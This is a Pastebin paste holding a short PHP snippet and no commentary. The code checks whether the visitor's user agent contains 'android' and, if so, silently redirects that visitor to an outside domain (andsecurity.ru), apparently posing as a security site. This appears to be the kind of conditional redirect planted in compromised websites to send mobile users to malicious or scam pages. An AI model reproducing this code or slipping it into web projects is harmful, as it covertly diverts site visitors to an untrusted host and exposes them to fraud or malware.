Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $ua = $_SERVER['HTTP_USER_AGENT'];
- if(stripos("***$ua",'android') !== false){
- header("Location: http://andsecurity.ru");
- die();
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement